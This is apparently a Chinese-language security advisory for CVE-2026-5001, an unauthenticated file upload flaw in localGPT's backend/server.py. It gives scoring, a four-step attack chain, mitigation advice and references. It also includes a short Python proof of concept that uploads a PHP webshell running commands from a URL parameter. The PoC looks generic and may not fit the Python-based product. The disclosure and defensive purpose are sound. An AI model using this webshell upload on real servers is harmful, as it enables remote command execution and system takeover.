CVE-2026-5001 CVSS 7.3 高危

CVE-2026-5001 PromtEngineer localGPT 无限制文件上传漏洞

披露日期: 2026-03-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5001

漏洞类型

任意文件上传

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

PromtEngineer localGPT

漏洞概述

PromtEngineer localGPT 在 commit 4d41c7d 之前的版本中存在严重的安全漏洞。该漏洞位于 backend/server.py 文件的 do_POST 函数，由于缺少对上传文件的有效过滤，导致无限制文件上传。攻击者无需任何认证即可远程利用此漏洞，上传恶意文件至服务器。鉴于该产品采用滚动发布策略，受影响的具体版本号难以精确锁定，且厂商目前尚未对此漏洞做出响应。该漏洞已被公开利用，对系统安全构成严重威胁。

技术细节

该漏洞的核心在于 PromtEngineer localGPT 后端服务器代码处理文件上传请求时的逻辑缺陷。具体而言，backend/server.py 中的 do_POST 函数在接收到客户端发送的 POST 请求时，未能正确验证上传文件的类型、扩展名及内容。攻击者可以利用这一缺陷，通过构造恶意的 HTTP POST 请求，将包含恶意代码的文件（如 WebShell 或脚本文件）上传到服务器的 Web 目录下。由于该漏洞无需用户交互且无需身份验证，攻击者可轻易地在远程主机上执行代码。成功上传后，攻击者可通过浏览器访问该文件，从而在服务器端执行任意命令，完全控制受害系统，导致敏感信息泄露、数据篡改或服务中断。CVSS 3.1 评分 7.3，属于高危漏洞。

攻击链分析

STEP 1

信息收集

攻击者识别运行 PromtEngineer localGPT 的目标服务器及其上传接口。

STEP 2

漏洞利用

攻击者构造包含恶意文件（如WebShell）的POST请求，发送至 backend/server.py 的 do_POST 接口。

STEP 3

文件上传

由于缺乏校验，服务器接收并保存了恶意文件到可访问目录。

STEP 4

执行与控制

攻击者通过浏览器访问上传的恶意文件，在服务器端执行任意代码，获取系统控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Example based on the vulnerability description)
target_url = "http://target-ip:port/upload"

# Malicious file to upload (e.g., a webshell)
files = {
    'file': ('exploit.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php')
}

try:
    # Sending POST request to the vulnerable endpoint
    response = requests.post(target_url, files=files, timeout=10)

    if response.status_code == 200:
        print("[+] Exploit successful! File uploaded.")
        print("[+] Check the upload directory to access the file.")
    else:
        print("[-] Exploit failed. Status code:", response.status_code)
except Exception as e:
    print("[-] Error:", e)

影响范围

PromtEngineer localGPT <= commit 4d41c7d1713b16b216d8e062e51a5dd88b20b054

防御指南

临时缓解措施

建议立即检查服务器上是否存在异常文件，并限制对服务端口的网络访问，仅允许受信任的IP地址连接。如果可能，应暂时禁用文件上传功能，直到应用修复补丁。同时，配置服务器禁止在上传目录中执行任何脚本文件。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5001
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5001
3 Details https://www.cvedetails.com/cve/CVE-2026-5001/
4 VulDB https://vuldb.com/cve/CVE-2026-5001
5 Link https://github.com/August829/CVEP/issues/7
6 Link https://vuldb.com/submit/778316
7 Link https://vuldb.com/vuln/353888
8 Link https://vuldb.com/vuln/353888/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表